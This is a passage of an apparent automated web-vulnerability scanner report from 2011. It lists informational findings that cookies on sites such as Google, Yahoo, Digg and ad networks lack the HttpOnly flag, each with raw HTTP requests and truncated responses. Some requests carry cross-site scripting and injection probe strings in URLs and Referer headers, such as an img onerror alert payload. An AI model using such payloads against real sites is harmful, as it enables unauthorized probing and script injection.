Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:04:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=a5a07ae786cc1296:TM=1296770658:LM=1296770658:S=yVxBuI2w2sM7RSeS; expires=Sat, 02-Feb-2013 22:04:18 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

13.165. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:08 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=cb6b836b6760c3ac:TM=1296765128:LM=1296765128:S=HgS2nFLrqCV4X1Jh; expires=Sat, 02-Feb-2013 20:32:08 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

13.166. http://core.insightexpressai.com/adServer/adServerESI.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adServer/adServerESI.aspx HTTP/1.1
Host: core.insightexpressai.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 18
Content-Type: text/html; charset=utf-8
Set-Cookie: DW=221e32e71296770758; expires=Wed, 29-Jan-2031 22:05:58 GMT; path=/; domain=insightexpressai.com
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Expires: Thu, 03 Feb 2011 22:05:58 GMT
Pragma: no-cache
Date: Thu, 03 Feb 2011 22:05:58 GMT
Connection: close
Cache-Control: no-store

//banner not found

13.167. http://delicious.com/save  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delicious.com
Path:   /save

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /save HTTP/1.1
Host: delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Feb 2011 19:35:43 GMT
Set-Cookie: BX=ab7m0op6km0sf&b=3&s=10; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/save
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.19.4

The document has moved <A HREF="http://www.delicious.com/save">here</A>.<P>
<!-- fe06.web.del.ac4.yahoo.net uncompressed/chunked Thu Feb 3 19:35:43 UTC 2011 -->

13.168. http://developer.yahoo.com/yui/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.yahoo.com
Path:   /yui/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yui/ HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:44 GMT
Set-Cookie: B=auto2ed6km1j0&b=3&s=j0; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 29638

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="descr
...[SNIP]...

13.169. http://developer.yahoo.com/yui/license.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.yahoo.com
Path:   /yui/license.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yui/license.html HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:04:29 GMT
Set-Cookie: B=1pm748p6klrhd&b=3&s=dl; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 22172

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="descr
...[SNIP]...

13.170. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Fri, 04-Feb-2011 19:35:44 GMT; path=/; domain=digg.com
Set-Cookie: d=0ff09a9ff26d23c27385462bc99e308f35991a0289651f6a22602a6a428198db; expires=Wed, 03-Feb-2021 05:43:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21532 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...

13.171. http://ds.addthis.com/red/psi/sites/www.ip-adress.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ip-adress.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 286
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:19 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:19 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842119.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 02:28:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 04 Feb 2011 17:55:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:55:19 GMT
Connection: close

_ate.ad.hpr({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.ip-adress.com%2fwhois%2fsmartdevil.com44a08%27%253b28a34
...[SNIP]...

13.172. http://dt.scanscout.com/ssframework/dt/pt.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dt.scanscout.com
Path:   /ssframework/dt/pt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ssframework/dt/pt.png?trackcd=1288991585470 HTTP/1.1
Host: dt.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:44 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: behavioralSegments=29_110203|32_110203|263_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:44 GMT; Path=/
Content-Length: 101
Connection: close
Content-Type: image/png

.PNG
.
...IHDR.....................sRGB.........bKGD.............IDAT..c````......^.*:....IEND.B`.

13.173. http://edge.quantserve.com/quant.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.quantserve.com
Path:   /quant.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quant.js HTTP/1.1
Host: edge.quantserve.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
ETag: "18334:E0-1152220633-1296770771366"
Vary: Accept-Encoding
Last-Modified: Thu, 03-Feb-2011 22:06:11 GMT
Content-Type: application/x-javascript
Set-Cookie: mc=4d4b26d3-59834-71bae-edc2f; expires=Thu, 03-Feb-2021 22:06:11 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 04 Feb 2011 22:06:11 GMT
Content-Length: 5265
Date: Thu, 03 Feb 2011 22:06:11 GMT
Server: QS

if(!__qc){var __qc={qcdst:function(){if(__qc.qctzoff(0)!=__qc.qctzoff(6))return 1;return 0;},qctzoff:function(m){var d1=new Date(2000,m,1,0,0,0,0);var t=d1.toGMTString();var d3=new Date(t.substring(0,
...[SNIP]...

13.174. http://forums.digitalpoint.com/showthread.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.digitalpoint.com
Path:   /showthread.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1
Host: forums.digitalpoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:20 GMT
Server: Apache
Set-Cookie: bb_lastvisit=1296765140; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: bb_lastactivity=0; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: dyk=1; expires=Thu, 10-Feb-2011 20:32:20 GMT; path=/; domain=.digitalpoint.com
Cache-Control: private
Pragma: private
Content-Length: 24249
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

13.175. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296787016&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787016748&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296787013038&frm=0&adk=2139689042&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=2&dtd=12&xpc=YHKwpL9Wg6&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: id=2299c2bdf900002f||t=1296786962|et=730|cs=ziqtnqpy; expires=Sun, 03-Feb-2013 02:36:02 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:36:02 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Fri, 04 Feb 2011 02:36:02 GMT
Content-Length: 5976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#993400;cursor:hand;}body,table,div,ul,li{font-size
...[SNIP]...

13.176. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=7707606529&w=728&lmt=1296787013&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787012997&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296787013038&frm=0&adk=1367998553&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=1&dtd=145&xpc=LTjYuEf78i&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:50:59 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:35:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Fri, 04 Feb 2011 02:35:59 GMT
Content-Length: 4758

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

13.177. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a882ba2c85085b39:TM=1296765185:LM=1296765185:S=gXivMzaMSKmp3KUf; expires=Sat, 02-Feb-2013 20:33:05 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:33:05 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

13.178. http://hit.clickaider.com/clickaider.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hit.clickaider.com
Path:   /clickaider.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clickaider.js HTTP/1.1
Host: hit.clickaider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=4d3f2276-241363738113; clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; vid=3e136b53-42127475201;

Response

HTTP/1.1 200 OK
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Expires: Fri, 04 Feb 2011 20:32:22 GMT
Cache-Control: private, max-age=86400
Set-Cookie: vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT
Content-Type: application/x-javascript
Content-Length: 9501
Date: Thu, 03 Feb 2011 20:32:22 GMT
Server: lighttpd/1.4.18

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...

13.179. http://hit.clickaider.com/pv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hit.clickaider.com
Path:   /pv

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pv?lng=156&&lnks=&t=Boardreader%20-%20Forum%20Search%20Engine&c=9f671068-5&r=&tz=-360&var1=main%20page&var3=general%20user&loc=http%3A%2F%2Fboardreader.com%2F&rnd=5831 HTTP/1.1
Host: hit.clickaider.com
Proxy-Connection: keep-alive
Referer: http://boardreader.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=3e136b53-42127475201

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; path=/; domain=.clickaider.com
Set-Cookie: sid=4d3f2276-241363738113; path=/; domain=.clickaider.com
Cache-Control: no-cache, private, proxy-revalidate, max-age=86400
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Thu, 03 Feb 2011 19:52:09 GMT
Server: lighttpd/1.4.18

GIF89a.............!.......,...........D..;

13.180. http://l0.scanscout.com/ssframework/log/log.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l0.scanscout.com
Path:   /ssframework/log/log.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssframework/log/log.png?a=logitemaction&CbC=1&CbF=true&EC=3&RC=3&SmC=2&AmN=1&CbM=b25%2F1&admode=preroll&VI=33687174&PRI=1386067554&VC=0&Uzip=N%2FA&RvN=1&RprC=0&ADsn=1&VcaI=96%2C192%2C200&RrC=0&VgI=26d91cdf5493d1dd943311e83ddb679d&SfF=true&AVI=57872&Ust=dc&Uctry=us&AC=4&CI=1426141&PI=626&CC=0&Udma=511&ADI=5945246&VmC=0&VscaI=96&VclF=true&PC=1 HTTP/1.1
Host: l0.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:37 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:37 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: campUnique=1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:37 GMT; Path=/
Set-Cookie: sssrvyhst2=110203_1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:37 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 101
Connection: close
Content-Type: image/png

.PNG
.
...IHDR.....................sRGB.........bKGD.............IDAT..c````......^.*:....IEND.B`.

13.181. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=200&g=512 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
